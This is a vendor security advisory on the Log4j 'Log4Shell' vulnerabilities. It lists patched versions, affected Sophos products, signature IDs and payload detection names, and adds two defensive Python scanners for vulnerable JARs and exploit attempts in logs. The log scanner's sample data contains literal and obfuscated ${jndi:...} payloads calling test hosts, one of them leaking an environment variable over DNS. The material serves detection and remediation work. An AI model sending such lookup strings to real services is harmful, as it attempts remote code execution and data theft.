Advisory: Log4j zero-day vulnerability AKA Log4Shell (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, CVE-2021-44832)

Critical
CVE
CVE-2021-44228
CVE-2021-45046
CVE-2021-45105
CVE-2021-44832
Updated:
Product(s)
Client Authentication Agent
Cloud Optix
Intercept X Endpoint
Intercept X for Server
Reflexion
SafeGuard Enterprise (SGN)
Sophos Authenticator
Sophos Central
Sophos Connect Client 2.0
Sophos Email
Sophos Email Appliance (SEA)
Sophos Enterprise Console (SEC)
Sophos Firewall
Sophos Home
Sophos Mobile
Sophos Mobile EAS Proxy
Sophos RED
Sophos SSL VPN client
Sophos Transparent Authentication Suite (STAS)
Sophos UTM
Sophos UTM Manager
Sophos Web Appliance (SWA)
Sophos Wireless
Sophos ZTNA
SophosLabs Intelix
Publication ID sophos-sa-20211210-log4j-rce
Article version 27
First published
Workaround No

Overview

On Thursday December 9, 2021, a severe remote code execution vulnerability was disclosed in Apache Log4j, a very widely used logging library for Java web and server applications. Because Log4j is embedded in a broad range of server applications and services, the vulnerability is extremely dangerous, and the latest updates for those applications are urgent. Sophos has observed widespread malicious attempts to exploit internet-facing services using this vulnerability.

The vulnerability allows any attacker who can get attacker-controlled text into a logged message or a log message parameter to make the server load and execute code from a remote server: Log4j expands lookup strings such as ${jndi:...} inside the logged text, and the resulting Java Naming and Directory Interface (JNDI) call fetches the attacker's object. JNDI interfaces with a number of network services, including the Lightweight Directory Access Protocol (LDAP), the Domain Name System (DNS), Java Remote Method Invocation (RMI) and the Common Object Request Broker Architecture (CORBA). Sophos has seen exploitation attempts over LDAP, DNS and RMI, using a lookup URL for one of those services that points at an attacker-controlled external server.

Patches for Log4j

While there are steps that customers can take to mitigate the vulnerability, the best fix is to upgrade to a patched version; the first one released by Apache was Log4j 2.15.0.

Additional Log4j bugs, CVE-2021-45046 and CVE-2021-45105, caused Apache to update Log4j from 2.15.0 to version 2.17.0. A fourth CVE, CVE-2021-44832, was reported just after the Christmas 2021 weekend, on 2021-12-28, causing Apache to update Log4j to version 2.17.1. Sophos recommends that you update to Log4j 2.17.1.

If you have already started patching with version 2.15.0 but haven't completed the update on all systems, our recommendation is to finish patching the remaining systems with 2.17.1. This ensures every system is on at least 2.15.0, which addresses the critical CVE-2021-44228; you can then go back and upgrade the 2.15.0 systems to 2.17.1 so that you have the same version everywhere.
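The version logic above is simple to state but tedious to apply by hand across servers, especially where log4j-core is buried inside application WAR or EAR bundles. The following scanner is an added example written for this page, not Sophos tooling and not part of the advisory: it walks a directory tree, opens every JAR/WAR/EAR (recursing into nested archives), reads the version from the Maven pom.properties that Apache ships inside log4j-core, checks whether JndiLookup.class is still present, and classifies each hit against the 2.15.0 and 2.17.1 thresholds from the text. The metadata paths and the demo archives it builds are assumptions made for the example.

```python
"""Find log4j-core archives on disk and say which ones still need updating.

Added example (not Sophos code). It assumes the standard Maven metadata that
Apache ships inside log4j-core JARs (pom.properties under META-INF/maven)
and the path of JndiLookup.class, the class removed by the common manual
mitigation. Nested JARs/WARs/EARs are searched too, since application bundles
often embed their own log4j-core.
"""
import io
import os
import sys
import tempfile
import zipfile

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
RECOMMENDED = (2, 17, 1)   # version the advisory recommends
FIRST_FIX = (2, 15, 0)     # first release that addresses CVE-2021-44228


def parse_version(text):
    """'2.17.1' -> (2, 17, 1); tolerates suffixes such as '2.0-beta9' -> (2, 0, 0)."""
    parts = []
    for piece in text.strip().split(".")[:3]:
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        parts.append(int(digits) if digits else 0)
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def classify(version, has_jndi_lookup):
    """Map a log4j-core 2.x version to the action the advisory implies.
    Apache's Java 7/6 backport lines (2.12.x, 2.3.x) are not special-cased here."""
    if version >= RECOMMENDED:
        return "ok"
    if version >= FIRST_FIX:
        return "upgrade"      # CVE-2021-44228 fixed, later CVEs not: go to 2.17.1
    if not has_jndi_lookup:
        return "mitigated"    # JndiLookup.class removed; still upgrade when you can
    return "vulnerable"


def inspect_archive(data, path):
    """Yield (path, version, has_jndi_lookup) for each log4j-core inside data,
    recursing into nested archives and labelling them path!inner/entry."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    names = set(zf.namelist())
    if POM_PROPS in names:
        props = zf.read(POM_PROPS).decode("utf-8", "replace").splitlines()
        versions = [line.split("=", 1)[1].strip() for line in props if line.startswith("version=")]
        if versions:
            yield (path, versions[0], JNDI_LOOKUP in names)
    for name in sorted(names):
        if name.lower().endswith(ARCHIVE_SUFFIXES):
            yield from inspect_archive(zf.read(name), path + "!" + name)


def scan_tree(root):
    """Walk root and return [(path, version, action), ...] for every log4j-core found."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for fn in sorted(filenames):
            if not fn.lower().endswith(ARCHIVE_SUFFIXES):
                continue
            full = os.path.join(dirpath, fn)
            with open(full, "rb") as fh:
                data = fh.read()
            for path, version, has_lookup in inspect_archive(data, full):
                findings.append((path, version, classify(parse_version(version), has_lookup)))
    return findings


def build_fake_log4j_core(version, include_jndi_lookup=True):
    """Constructed stand-in for a log4j-core JAR (test data, not a real Apache build)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"artifactId=log4j-core\nversion={version}\n")
        if include_jndi_lookup:
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # class-file magic only
    return buf.getvalue()


def build_demo_tree():
    """Create a temp directory of constructed samples, including a WAR that embeds
    an old log4j-core, and return its path."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", build_fake_log4j_core("2.14.1"))
    samples = {
        "app.war": war.getvalue(),
        "log4j-core-2.14.1-stripped.jar": build_fake_log4j_core("2.14.1", False),
        "log4j-core-2.16.0.jar": build_fake_log4j_core("2.16.0"),
        "log4j-core-2.17.1.jar": build_fake_log4j_core("2.17.1"),
    }
    for name, blob in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(blob)
    return root


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else build_demo_tree()
    for path, version, action in scan_tree(target):
        print(f"{action:10s} {version:8s} {path}")
```

Run it with a directory argument to scan a real host; without one it scans the constructed demo tree. A "mitigated" result (JndiLookup.class removed from an old build) should still be scheduled for an upgrade to 2.17.1, matching the advisory's recommendation to end up on one version everywhere.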

What Sophos products are affected?

Sophos is reviewing and patching all affected applications and services as part of its incident response process.

Product or Service | Status | Description
Cloud Optix | Patched | Users may have noticed a brief outage on Friday, December 10, 2021 around 12:30 PM UTC as updates were deployed. Sophos performed host forensics and log analysis in the Cloud Optix environment and determined that the vulnerability was not successfully exploited prior to fixes being deployed.
PureMessage | Not vulnerable | PMX does not use Log4j.
Reflexion | Not impacted | Reflexion does not run an exploitable configuration.
SafeGuard Enterprise (SGN) | Not vulnerable | SGN does not use Log4j.
SG UTM (all versions) | Not vulnerable | SG UTM does not use Log4j.
SG UTM Manager (SUM) (all versions) | Not vulnerable | SUM does not use Log4j.
Sophos Authenticator | Not vulnerable | Sophos Authenticator does not use Log4j.
Sophos Central | Not impacted | Sophos Central does not run an exploitable configuration.
Sophos Endpoint protection (Windows/Mac/Linux) | Not vulnerable | Sophos Endpoint protection (Intercept X Endpoint, Intercept X for Server) does not use Log4j.
Sophos Email | Patched | Sophos performed host forensics and log analysis in the Sophos Email environment and determined that the vulnerability was not successfully exploited prior to fixes being deployed.
Sophos Email Appliance | Not vulnerable | SEA does not use Log4j.
Sophos Enterprise Console (SEC) | Not vulnerable | SEC does not use Log4j.
Sophos Firewall (all versions) | Not vulnerable | Sophos Firewall does not use Log4j.
Sophos Firewall auxiliary clients | Not vulnerable | None of the Sophos Firewall auxiliary clients use Log4j:
  • Sophos Connect Client
  • Sophos SSL VPN client
  • Sophos Transparent Authentication Suite (STAS)
  • Sophos Authentication for Thin Client (SATC) (EOL)
  • Client Authentication Agent (all versions)
Sophos Home | Not vulnerable | Sophos Home does not use Log4j.
Sophos Mobile | Not impacted | Sophos Mobile (in Central, SaaS, and on-premises) does not run an exploitable configuration.
Sophos Mobile EAS Proxy | Impacted | The Sophos Mobile Standalone EAS Proxy was affected by CVE-2021-44228 and the fix was included in version 9.7.2, released on Monday December 13, 2021. The fix is also available in version 9.7.3 and all subsequent releases. Customers can download the latest version of the Standalone EAS Proxy Installer from the Sophos website.
Sophos RED | Not vulnerable | RED does not use Log4j.
Sophos Web Appliance | Not vulnerable | SWA does not use Log4j.
Sophos Wireless | Not vulnerable | Sophos Wireless access points do not use Log4j.
Sophos ZTNA | Not vulnerable | Sophos ZTNA does not use Log4j.
SophosLabs Intelix | Not vulnerable | SophosLabs Intelix does not use Log4j.

How are Sophos customers protected?

Sophos Managed Threat Response (MTR) customers

Sophos is actively monitoring MTR customer accounts for post-exploit activity.

IPS Signatures

IPS signatures were published on December 11, 2021.

Sophos Firewall

  • SIDs are 2306426, 2306427, 2306428, 58722, 58723, 58724, 58725, 58726, 58727, 58728, 58729, 58730, 58731, 58732, 58733, 58734, 58735, 58736, 58737, 58738, 58739, 58740, 58741, 58742, 58743, 58744, 58751, 58784, 58785, 58786, 58787, 58788, 58789, 58790, 58795, 58801, 58802, 58803, 58804, 58805, 58806, 58807, 58808, 58809, 58810, 58811, 58812, 58813, 2306526

Sophos Endpoint

  • SIDs are 2306426, 2306427, 2306428, 2306438, 2306439, 2306440, 2306441, 2306490, 2306493, 2306494, 2306495, 2306496, 2306497, 2306499, 2306526, 2306569, 2306570, 2306571, 2306572, 2306573, 2306574

Sophos SG UTM

  • SIDs are 58722, 58723, 58724, 58725, 58726, 58727, 58728, 58729, 58730, 58731, 58732, 58733, 58734, 58735, 58736, 58737, 58738, 58739, 58740, 58741, 58742, 58743, 58744, 58751, 58784, 58785, 58786, 58787, 58788, 58789, 58790, 58795, 58801, 58802, 58803, 58804, 58805, 58806, 58807, 58808, 58809, 58810, 58811, 58812, 58813

Sophos XDR customers

Sophos XDR customers can use Sophos LiveQuery to help identify vulnerable Log4j components in their environment.

Example queries are maintained on the Sophos Community forum:

If you identify a vulnerable component, update it immediately and review your logs for any signs of exploitation attempts. Sophos expects that successful exploitation will not be logged by Log4j itself, so correlation with other log sources (for example web server access logs and outbound LDAP, RMI and DNS connections from the host) is required.
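The exploitation mechanism from the Overview (a ${jndi:...} lookup injected into logged text) is what the log review above is looking for, and real scanning traffic rarely contains the literal string "jndi": it hides it behind nested lookups. The scanner below is an added example for this page, not Sophos code and not a LiveQuery: it resolves the common nesting tricks the way Log4j 2.x expands them, then flags JNDI lookups and extracts the scheme and callback host. The access-log lines are constructed (RFC 5737 test addresses), the User-Agent and query-string positions are examples of where payloads land, and the scheme list is an assumption chosen to cover the LDAP, RMI and DNS attempts the advisory mentions plus a few other JNDI providers.

```python
"""Flag Log4Shell lookup strings in web-server access logs.

Added example, not Sophos code. The access-log lines are constructed (RFC 5737
test addresses); the obfuscation forms handled (nested ${lower:..}/${upper:..},
${::-x} default-value tricks, and ${env:..}/${sys:..} exfiltration inside the
JNDI URL) are the common ones seen in Log4Shell scanning traffic.
"""
import re

# Innermost ${...} lookup: no braces inside, so nesting is resolved inside-out.
_LOOKUP = re.compile(r"\$\{([^{}]*)\}")
# JNDI URL schemes worth flagging; real exploit traffic was mostly ldap, rmi and dns.
_SCHEMES = ("ldaps", "ldap", "rmi", "dns", "iiop", "corba", "nis", "nds", "http")
_JNDI = re.compile(r"\$\{jndi:\s*(" + "|".join(_SCHEMES) + r")://([^}\s/]+)", re.IGNORECASE)


def _resolve(inner):
    """Evaluate one innermost lookup as Log4j 2.x would, for the subset attackers abuse."""
    if ":" not in inner:
        return inner                         # plain text, nothing to resolve
    prefix, _, rest = inner.partition(":")
    if prefix.lower() == "lower":
        return rest.lower()
    if prefix.lower() == "upper":
        return rest.upper()
    if ":-" in inner:                        # ${name:-default} -> default when name is unknown
        return inner.rsplit(":-", 1)[1]
    return "<" + inner + ">"                 # env/sys/date/...: keep a readable marker


def normalize(line, max_rounds=20):
    """Collapse nested non-JNDI lookups so obfuscated payloads read as plain ${jndi:...}."""
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            inner = m.group(1)
            if inner.lower().startswith("jndi:"):
                return m.group(0)            # keep the JNDI lookup itself for the matcher
            changed = True
            return _resolve(inner)

        line = _LOOKUP.sub(repl, line)
        if not changed:
            break
    return line


def find_jndi(line):
    """Return [(scheme, host), ...] for every JNDI lookup found after normalisation."""
    return [(m.group(1).lower(), m.group(2)) for m in _JNDI.finditer(normalize(line))]


def scan_log(text):
    """Return [(line_no, client_ip, scheme, host), ...] for lines carrying a JNDI lookup."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        client = line.split(" ", 1)[0]
        for scheme, host in find_jndi(line):
            hits.append((no, client, scheme, host))
    return hits


# Constructed sample: Apache combined log format, payloads in User-Agent and query string.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Dec/2021:12:31:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2021:12:31:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.23:1389/a}"
203.0.113.9 - - [10/Dec/2021:12:31:06 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://198.51.100.23:1389/b} HTTP/1.1" 404 0 "-" "curl/7.79"
203.0.113.9 - - [10/Dec/2021:12:31:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.23:1099/c}"
203.0.113.9 - - [10/Dec/2021:12:31:08 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:dns://${env:HOSTNAME}.198-51-100-23.example.net/d}"
203.0.113.11 - - [10/Dec/2021:12:31:09 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 200 12 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for no, client, scheme, host in scan_log(SAMPLE_LOG):
        print(f"line {no}: {client} -> {scheme}://{host}")
```

The last sample line shows why the normalisation step matters in both directions: a benign ${date:yyyy} in a URL path is not flagged, while the three obfuscated payloads collapse to the same ${jndi:ldap://...} or ${jndi:rmi://...} form as the plain one. The extracted callback host is the pivot for the correlation the advisory asks for: look for outbound connections from the web host to that address on the LDAP, RMI or DNS port around the same timestamp.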

Malicious Payload Detections

SophosLabs has published detections for the malicious payloads delivered via Log4Shell. The detections are predominantly for cryptominers, attack scripts and malicious Java downloaders. Please note that not all of these payloads are exclusive to Log4Shell; they may also arrive via other vectors.

  • Troj/JavaDl-AAN
  • Troj/Java-AIN
  • Troj/Java-AIP
  • Troj/JavaDI-AAO
  • Troj/BatDl-GR
  • Troj/Ransom-GME
  • Troj/StealthL-A
  • Troj/Bckdr-RYB
  • Troj/Khonsari-A
  • Troj/PSDl-LR
  • Mal/JavaKC-B
  • XMRig Miner (PUA)
  • Mal/ShellDl-A
  • Mal/ExpJava-AL
  • Mal/ExpJava-AN
  • Mal/ExpJava-AO
  • Mal/ExpJava-AQ
  • App/StlthLdr-A
  • Linux/DDoS-DT
  • Linux/DDoS-DS
  • Linux/Miner-ABU
  • Linux/Miner-ADG
  • Linux/Miner-ADH
  • Linux/Miner-ZS
  • Linux/Miner-WU
  • Linux/Rootkt-M
  • Linux/Swrort-G
  • Linux/Miner-EQ
  • Linux/DDoS-CI
  • Linux/DDoS-CIA


Related Information